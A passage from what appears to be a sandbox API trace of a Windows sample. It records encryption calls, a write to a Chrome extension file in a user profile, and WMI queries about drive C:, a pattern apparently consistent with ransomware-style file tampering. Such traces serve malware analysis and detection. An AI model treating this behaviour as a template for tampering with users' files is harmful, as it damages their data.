dwFlags=0x0) returned 1 [0202.270] CryptDuplicateKey (in: hKey=0xb7fa50, pdwReserved=0x0, dwFlags=0x0, phKey=0x949e95c | out: phKey=0x949e95c*=0xb7f4d0) returned 1 [0202.271] CryptContextAddRef (hProv=0xbdfe98, pdwReserved=0x0, dwFlags=0x0) returned 1 [0202.271] CryptSetKeyParam (hKey=0xb7f4d0, dwParam=0x4, pbData=0x37a3514*=0x1, dwFlags=0x0) returned 1 [0202.271] CryptSetKeyParam (hKey=0xb7f4d0, dwParam=0x1, pbData=0x37a34e0, dwFlags=0x0) returned 1 [0202.271] CryptEncrypt (in: hKey=0xb7f4d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37a3524*, pdwDataLen=0x949e9c8*=0xd30, dwBufLen=0xd30 | out: pbData=0x37a3524*, pdwDataLen=0x949e9c8*=0xd30) returned 1 [0202.271] CryptEncrypt (in: hKey=0xb7f4d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37a4278*, pdwDataLen=0x949e9d0*=0x0, dwBufLen=0x10 | out: pbData=0x37a4278*, pdwDataLen=0x949e9d0*=0x10) returned 1 [0202.273] CryptDestroyKey (hKey=0xb7fa50) returned 1 [0202.273] CryptReleaseContext (hProv=0xbdfe98, dwFlags=0x0) returned 1 [0202.273] CryptReleaseContext (hProv=0xbdfe98, dwFlags=0x0) returned 1 [0202.273] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png", nBufferLength=0x105, lpBuffer=0x949e440, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png", lpFilePart=0x0) returned 0x8a [0202.273] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e934) returned 1 [0202.273] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x598 [0202.274] GetFileType (hFile=0x598) returned 0x1 [0202.274] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e930) returned 1 [0202.275] GetFileType (hFile=0x598) returned 0x1 [0202.275] WriteFile (in: hFile=0x598, lpBuffer=0x37a4928*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949e9c4, lpOverlapped=0x0 | out: lpBuffer=0x37a4928*, lpNumberOfBytesWritten=0x949e9c4*=0x20, lpOverlapped=0x0) returned 1 [0202.276] CloseHandle (hObject=0x598) returned 1 [0202.277] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0202.277] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0202.277] CoTaskMemFree (pv=0xbed438) [0202.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e428, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0202.277] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e970 | out: ppv=0x949e970*=0xb51e34) returned 0x0 [0202.277] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e968 | out: pAptType=0x949e968*=1) returned 0x0 [0202.277] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e96c | out: ppvObject=0x949e96c*=0x0) returned 0x80004002 [0202.277] IUnknown:Release (This=0xb51e34) returned 0x1 [0202.279] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e2d8 | out: ppv=0x949e2d8*=0x60278e0) returned 0x0 [0202.279] WbemDefPath:IUnknown:QueryInterface (in: This=0x60278e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e4f0 | out: ppvObject=0x949e4f0*=0x0) returned 0x80004002 [0202.279] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60278e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e504 | out: ppvObject=0x949e504*=0x6030b00) returned 0x0 [0202.279] WbemDefPath:IUnknown:Release (This=0x60278e0) returned 0x0 [0202.279] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e124 | out: ppvObject=0x949e124*=0x6030b00) returned 0x0 [0202.279] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e0e0 | out: ppvObject=0x949e0e0*=0x0) returned 0x80004002 [0202.279] WbemDefPath:IUnknown:AddRef (This=0x6030b00) returned 0x3 [0202.279] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949da3c | out: ppvObject=0x949da3c*=0x0) returned 0x80004002 [0202.279] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d9ec | out: ppvObject=0x949d9ec*=0x0) returned 0x80004002 [0202.279] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d9f8 | out: ppvObject=0x949d9f8*=0x66ce438) returned 0x0 [0202.279] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce438, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949da00 | out: pCid=0x949da00*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0202.279] WbemDefPath:IUnknown:Release (This=0x66ce438) returned 0x3 [0202.279] CoGetContextToken (in: pToken=0x949da58 | out: pToken=0x949da58) returned 0x0 [0202.280] CoGetContextToken (in: pToken=0x949de60 | out: pToken=0x949de60) returned 0x0 [0202.280] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949def0 | out: ppvObject=0x949def0*=0x0) returned 0x80004002 [0202.280] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x2 [0202.280] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x1 [0202.280] CoGetContextToken (in: pToken=0x949e7e8 | out: pToken=0x949e7e8) returned 0x0 [0202.280] CoGetContextToken (in: pToken=0x949e748 | out: pToken=0x949e748) returned 0x0 [0202.280] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x949e818*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e814 | out: ppvObject=0x949e814*=0x6030b00) returned 0x0 [0202.280] WbemDefPath:IUnknown:AddRef (This=0x6030b00) returned 0x3 [0202.280] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x2 [0202.280] WbemDefPath:IWbemPath:SetText (This=0x6030b00, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0202.280] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x949e99c | out: puCount=0x949e99c*=0x0) returned 0x0 [0202.280] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x949e998*=0x0, pszText=0x0 | out: puBuffLength=0x949e998*=0x20, pszText=0x0) returned 0x0 [0202.280] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x949e998*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e998*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0202.280] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b00, uRequestedInfo=0x0, puResponse=0x949e9a4 | out: puResponse=0x949e9a4*=0xc19) returned 0x0 [0202.280] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x949e99c | out: puCount=0x949e99c*=0x0) returned 0x0 [0202.280] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b00, uRequestedInfo=0x0, puResponse=0x949e9a4 | out: puResponse=0x949e9a4*=0xc19) returned 0x0 [0202.280] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b00, uRequestedInfo=0x0, puResponse=0x949e9a4 | out: puResponse=0x949e9a4*=0xc19) returned 0x0 [0202.280] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x949e91c | out: puCount=0x949e91c*=0x0) returned 0x0 [0202.280] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e908 | out: puCount=0x949e908*=0x2) returned 0x0 [0202.280] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e904*=0x0, pszText=0x0 | out: puBuffLength=0x949e904*=0xf, pszText=0x0) returned 0x0 [0202.280] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e904*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e904*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0202.280] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e8b8 | out: ppv=0x949e8b8*=0xb51e34) returned 0x0 [0202.280] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e8b0 | out: pAptType=0x949e8b0*=1) returned 0x0 [0202.281] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e8b4 | out: ppvObject=0x949e8b4*=0x0) returned 0x80004002 [0202.281] IUnknown:Release (This=0xb51e34) returned 0x1 [0202.282] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e220 | out: ppv=0x949e220*=0x6027910) returned 0x0 [0202.282] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027910, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e438 | out: ppvObject=0x949e438*=0x0) returned 0x80004002 [0202.282] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027910, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e44c | out: ppvObject=0x949e44c*=0x60305c0) returned 0x0 [0202.282] WbemDefPath:IUnknown:Release (This=0x6027910) returned 0x0 [0202.282] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e06c | out: ppvObject=0x949e06c*=0x60305c0) returned 0x0 [0202.282] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e028 | out: ppvObject=0x949e028*=0x0) returned 0x80004002 [0202.282] WbemDefPath:IUnknown:AddRef (This=0x60305c0) returned 0x3 [0202.282] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949d984 | out: ppvObject=0x949d984*=0x0) returned 0x80004002 [0202.282] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d934 | out: ppvObject=0x949d934*=0x0) returned 0x80004002 [0202.282] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d940 | out: ppvObject=0x949d940*=0x66ce418) returned 0x0 [0202.283] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce418, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d948 | out: pCid=0x949d948*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0202.283] WbemDefPath:IUnknown:Release (This=0x66ce418) returned 0x3 [0202.283] CoGetContextToken (in: pToken=0x949d9a0 | out: pToken=0x949d9a0) returned 0x0 [0202.283] CoGetContextToken (in: pToken=0x949dda8 | out: pToken=0x949dda8) returned 0x0 [0202.283] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949de38 | out: ppvObject=0x949de38*=0x0) returned 0x80004002 [0202.283] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x2 [0202.283] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x1 [0202.283] CoGetContextToken (in: pToken=0x949e730 | out: pToken=0x949e730) returned 0x0 [0202.283] CoGetContextToken (in: pToken=0x949e690 | out: pToken=0x949e690) returned 0x0 [0202.283] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x949e760*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e75c | out: ppvObject=0x949e75c*=0x60305c0) returned 0x0 [0202.283] WbemDefPath:IUnknown:AddRef (This=0x60305c0) returned 0x3 [0202.283] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x2 [0202.283] WbemDefPath:IWbemPath:SetText (This=0x60305c0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0202.283] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x949e8e0 | out: puCount=0x949e8e0*=0x2) returned 0x0 [0202.283] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x949e8dc*=0x0, pszText=0x0 | out: puBuffLength=0x949e8dc*=0xf, pszText=0x0) returned 0x0 [0202.283] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x949e8dc*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e8dc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0202.283] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e8e0 | out: ppv=0x949e8e0*=0xb51e34) returned 0x0 [0202.283] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e8d8 | out: pAptType=0x949e8d8*=1) returned 0x0 [0202.284] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e8dc | out: ppvObject=0x949e8dc*=0x0) returned 0x80004002 [0202.284] IUnknown:Release (This=0xb51e34) returned 0x1 [0202.285] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e500 | out: ppv=0x949e500*=0x6024b48) returned 0x0 [0202.285] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b48, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e718 | out: ppvObject=0x949e718*=0x0) returned 0x80004002 [0202.285] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024b48, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e72c | out: ppvObject=0x949e72c*=0x60276e0) returned 0x0 [0202.285] WbemLocator:IUnknown:Release (This=0x6024b48) returned 0x0 [0202.285] WbemLocator:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e34c | out: ppvObject=0x949e34c*=0x60276e0) returned 0x0 [0202.285] WbemLocator:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e308 | out: ppvObject=0x949e308*=0x0) returned 0x80004002 [0202.285] WbemLocator:IUnknown:AddRef (This=0x60276e0) returned 0x3 [0202.285] WbemLocator:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dc64 | out: ppvObject=0x949dc64*=0x0) returned 0x80004002 [0202.285] WbemLocator:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949dc14 | out: ppvObject=0x949dc14*=0x0) returned 0x80004002 [0202.285] WbemLocator:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949dc20 | out: ppvObject=0x949dc20*=0x0) returned 0x80004002 [0202.285] CoGetContextToken (in: pToken=0x949dc80 | out: pToken=0x949dc80) returned 0x0 [0202.285] CoGetContextToken (in: pToken=0x949e088 | out: pToken=0x949e088) returned 0x0 [0202.285] WbemLocator:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e118 | out: ppvObject=0x949e118*=0x0) returned 0x80004002 [0202.285] WbemLocator:IUnknown:Release (This=0x60276e0) returned 0x2 [0202.286] WbemLocator:IUnknown:Release (This=0x60276e0) returned 0x1 [0202.286] CoGetContextToken (in: pToken=0x949e6f8 | out: pToken=0x949e6f8) returned 0x0 [0202.286] CoGetContextToken (in: pToken=0x949e658 | out: pToken=0x949e658) returned 0x0 [0202.286] WbemLocator:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x949e728*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x949e724 | out: ppvObject=0x949e724*=0x60276e0) returned 0x0 [0202.286] WbemLocator:IUnknown:AddRef (This=0x60276e0) returned 0x3 [0202.286] WbemLocator:IUnknown:Release (This=0x60276e0) returned 0x2 [0202.286] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x949e8bc | out: puCount=0x949e8bc*=0x2) returned 0x0 [0202.286] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=8, puBuffLength=0x949e8b8*=0x0, pszText=0x0 | out: puBuffLength=0x949e8b8*=0xf, pszText=0x0) returned 0x0 [0202.286] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=8, puBuffLength=0x949e8b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e8b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0202.286] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e794 | out: ppv=0x949e794*=0x6027200) returned 0x0 [0202.286] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027200, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949e828 | out: ppNamespace=0x949e828*=0x60334d4) returned 0x0 [0202.958] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e6c4 | out: ppvObject=0x949e6c4*=0x66b46bc) returned 0x0 [0202.958] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x66b46bc, pProxy=0x60334d4, pAuthnSvc=0x949e714, pAuthzSvc=0x949e710, pServerPrincName=0x949e708, pAuthnLevel=0x949e70c, pImpLevel=0x949e6fc, pAuthInfo=0x949e700, pCapabilites=0x949e704 | out: pAuthnSvc=0x949e714*=0xa, pAuthzSvc=0x949e710*=0x0, pServerPrincName=0x949e708, pAuthnLevel=0x949e70c*=0x6, pImpLevel=0x949e6fc*=0x2, pAuthInfo=0x949e700, pCapabilites=0x949e704*=0x1) returned 0x0 [0202.958] WbemLocator:IUnknown:Release (This=0x66b46bc) returned 0x1 [0202.958] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e6b8 | out: ppvObject=0x949e6b8*=0x66b46dc) returned 0x0 [0202.959] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e6b4 | out: ppvObject=0x949e6b4*=0x66b46bc) returned 0x0 [0202.959] WbemLocator:IClientSecurity:SetBlanket (This=0x66b46bc, pProxy=0x60334d4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0202.959] WbemLocator:IUnknown:Release (This=0x66b46bc) returned 0x2 [0202.959] WbemLocator:IUnknown:Release (This=0x66b46dc) returned 0x1 [0202.959] CoTaskMemFree (pv=0xbd4a38) [0202.959] WbemLocator:IUnknown:Release (This=0x6027200) returned 0x0 [0202.959] WbemLocator:IUnknown:QueryInterface (in: This=0x60334d4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, 